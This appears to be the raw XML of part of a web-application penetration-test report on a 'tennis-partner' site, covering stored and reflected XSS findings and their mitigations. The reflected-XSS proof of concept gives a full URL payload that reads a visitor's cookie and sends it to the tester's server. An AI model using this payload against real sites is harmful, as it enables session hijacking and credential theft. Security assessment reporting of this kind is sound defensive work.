          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11AD4F27" wp14:editId="40C237C0">
            <wp:extent cx="5274310" cy="4371975"/>
            <wp:effectExtent l="0" t="0" r="254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1975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38181819" w14:textId="2ED3A697" w:rsidR="00E96F80" w:rsidRPr="00126A9F" w:rsidRDefault="00E96F80" w:rsidP="00126A9F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Whoever enters the 'Rankings' page will see the alert pop up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F614E01" w14:textId="77777777" w:rsidR="00E96F80" w:rsidRPr="00F94EEA" w:rsidRDefault="00E96F80" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E19D82" wp14:editId="6B647F7B">
            <wp:extent cx="5274310" cy="213741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7410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA2474" w14:textId="1319D39C" w:rsidR="00E96F80" w:rsidRPr="00126A9F" w:rsidRDefault="00E96F80" w:rsidP="00126A9F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We can also see the script in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155306F" w14:textId="77777777" w:rsidR="00E96F80" w:rsidRPr="00F94EEA" w:rsidRDefault="00E96F80" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097B8A3F" wp14:editId="63735067">
            <wp:extent cx="5274310" cy="69278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2785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2FF84D" w14:textId="77777777" w:rsidR="00936539" w:rsidRPr="00787602" w:rsidRDefault="00936539" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Reflected cross site scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0755840F" w14:textId="77777777" w:rsidR="00936539" w:rsidRPr="00752D67" w:rsidRDefault="00936539" w:rsidP="00752D67">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00752D67">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7DE15" w14:textId="77777777" w:rsidR="00007DE2" w:rsidRPr="00F94EEA" w:rsidRDefault="005B1D01" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The team found that the application is vulnerable to Reflected </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks. From the 'Search' page, where users can search other players based on their names or email addresses, a malicious user could enter a malicious script into one of the parameters that is being reflected on the page, based on the attacker's input, which isn't being validated in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFB309" w14:textId="77777777" w:rsidR="00936539" w:rsidRPr="00752D67" w:rsidRDefault="00DC2726" w:rsidP="00752D67">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00752D67">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691406DB" w14:textId="406C6362" w:rsidR="00044F51" w:rsidRPr="00126A9F" w:rsidRDefault="00044F51" w:rsidP="00126A9F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>While in the 'Search' page, we recognize that any input that were looking for is being reflected afterwards on the page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057EE4E" w14:textId="77777777" w:rsidR="00044F51" w:rsidRPr="00F94EEA" w:rsidRDefault="00044F51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59E05E20" wp14:editId="0F87E23F">
            <wp:extent cx="2779055" cy="2162755"/>
            <wp:effectExtent l="0" t="0" r="254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789" cy="2171108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DEBA6" w14:textId="5B719CD6" w:rsidR="00044F51" w:rsidRPr="00126A9F" w:rsidRDefault="00044F51" w:rsidP="00126A9F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> also notice that </w:t>
      </w:r>
      <w:r w:rsidR="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result reflects in the URL as well, meaning that the method that is being used is GET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625F375" w14:textId="77777777" w:rsidR="00044F51" w:rsidRPr="00F94EEA" w:rsidRDefault="00044F51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F9932A" w14:textId="77777777" w:rsidR="00044F51" w:rsidRPr="00F94EEA" w:rsidRDefault="00044F51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AFF3E96" wp14:editId="5D10E711">
            <wp:extent cx="3914637" cy="76728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274" cy="774853"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F8CEC" w14:textId="0608A1A3" w:rsidR="00044F51" w:rsidRPr="00BD506F" w:rsidRDefault="008427C6" w:rsidP="00BD506F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD506F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After trying to change the first parameter- q, we notice that the page is vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD506F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD506F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E0B56"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6C7D6AA3" wp14:editId="2270EBE6">
            <wp:extent cx="5274310" cy="474980"/>
            <wp:effectExtent l="0" t="0" r="254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4980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A58E4D"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6116939F" wp14:editId="3A2A1606">
            <wp:extent cx="5274310" cy="2051050"/>
            <wp:effectExtent l="0" t="0" r="254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1050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450F253"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7B9BC728" wp14:editId="223447B6">
            <wp:extent cx="5274310" cy="1959610"/>
            <wp:effectExtent l="0" t="0" r="2540"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59610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D162D" w14:textId="77777777" w:rsidR="008427C6" w:rsidRPr="00F94EEA" w:rsidRDefault="008427C6" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AAFE676" wp14:editId="5929126F">
            <wp:extent cx="4892648" cy="1591024"/>
            <wp:effectExtent l="0" t="0" r="381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505" cy="1595530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F85C6A" w14:textId="4245ECFA" w:rsidR="008427C6" w:rsidRPr="00BD506F" w:rsidRDefault="008427C6" w:rsidP="00BD506F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD506F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We'll enter a malicious script, so that when a user enters the link his cookie w</w:t>
      </w:r>
      <w:r w:rsidR="00517753">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD506F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ll be sent to another source</w:t>
      </w:r>
      <w:r w:rsidR="00517753">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>- our malicious server</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD506F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, and therefore will be stolen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA30A79" w14:textId="76BDD6AC" w:rsidR="00731468" w:rsidRDefault="00615479" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00517753">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.179.1/tennis-partner/search.php?q=%3Cscript%3Elet%20cookie=document.cookie;%20fetch(`http://192.168.179.1:1234/?cookie=${cookie}`);%3C/script%3E&amp;column=name&amp;submit=Find</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00517753" w:rsidRPr="00787602">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF8415" w14:textId="7789A64D" w:rsidR="00517753" w:rsidRPr="00517753" w:rsidRDefault="00517753" w:rsidP="00517753">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595F69DA" wp14:editId="7CCA4A19">
            <wp:extent cx="5274310" cy="878205"/>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8205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC931E" w14:textId="1726DD37" w:rsidR="00752D67" w:rsidRDefault="00752D67" w:rsidP="00752D67">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By using social </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>engineering</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00291DD9">
        <w:t>the attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could lure a user into clicking this link,</w:t>
      </w:r>
      <w:r w:rsidR="00291DD9">
        <w:t xml:space="preserve"> causing him to send his cookie</w:t>
      </w:r>
      <w:r w:rsidR="00A77B00">
        <w:t xml:space="preserve"> and therefore expose his credentials</w:t>
      </w:r>
      <w:r w:rsidR="00291DD9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46921B57" w14:textId="2E3D1E35" w:rsidR="00517753" w:rsidRDefault="00517753" w:rsidP="00752D67">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5AA28" w14:textId="6BE18AAE" w:rsidR="00A928F9" w:rsidRPr="00F94EEA" w:rsidRDefault="00A928F9" w:rsidP="00517753">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>An attacker could use this vulnerability in order to conduct a few malicious acts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEDB770" w14:textId="1BA48175" w:rsidR="00A928F9" w:rsidRPr="00517753" w:rsidRDefault="00A928F9" w:rsidP="00517753">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517753">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Channel users into a forged website, where he could steal their credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A34E16" w14:textId="595DD528" w:rsidR="00A928F9" w:rsidRPr="00517753" w:rsidRDefault="00A928F9" w:rsidP="00517753">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517753">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Steal user's cookie by sending it to another source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F741FD" w14:textId="6C6502D2" w:rsidR="00A928F9" w:rsidRDefault="00A928F9" w:rsidP="00517753">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517753">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Plant malicious scripts in the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A24C7" w14:textId="21D90F24" w:rsidR="00CE041D" w:rsidRPr="00517753" w:rsidRDefault="00CE041D" w:rsidP="00CE041D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> type attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAB4FE5" w14:textId="77777777" w:rsidR="00DC2726" w:rsidRPr="00787602" w:rsidRDefault="00681599" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24C006" w14:textId="0811EEDE" w:rsidR="00A928F9" w:rsidRPr="000946F0" w:rsidRDefault="00A928F9" w:rsidP="000946F0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implementing efficient validations over any inputs or outputs in the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE76E60" w14:textId="405A18E7" w:rsidR="00A928F9" w:rsidRPr="000946F0" w:rsidRDefault="00A928F9" w:rsidP="000946F0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Working with a white list- not allowing certain words or characters (such as '&lt;script&gt;' for example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F821FE7" w14:textId="5437F0B8" w:rsidR="00A928F9" w:rsidRPr="000946F0" w:rsidRDefault="00A928F9" w:rsidP="000946F0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Generally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> it's best to avoid using user inputs as outputs on the website. If it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> be done there needs to be a</w:t>
      </w:r>
      <w:r w:rsidR="003B39DC" w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>n appropriate sanitation over the input before it is being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0EE89D" w14:textId="4A89A463" w:rsidR="003B39DC" w:rsidRPr="000946F0" w:rsidRDefault="003B39DC" w:rsidP="000946F0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Usage of appropriate Response headers could help by avoiding malicious JS scripts in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFEA713" w14:textId="5FC95B9C" w:rsidR="006D660F" w:rsidRPr="000946F0" w:rsidRDefault="003B39DC" w:rsidP="000946F0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000946F0">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Usage of CSP could help by mitigating the consequences of XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C6E27" w14:textId="77777777" w:rsidR="006D660F" w:rsidRPr="00787602" w:rsidRDefault="006D660F" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Directory traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA975F" w14:textId="77777777" w:rsidR="006D660F" w:rsidRPr="00787602" w:rsidRDefault="006D660F" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
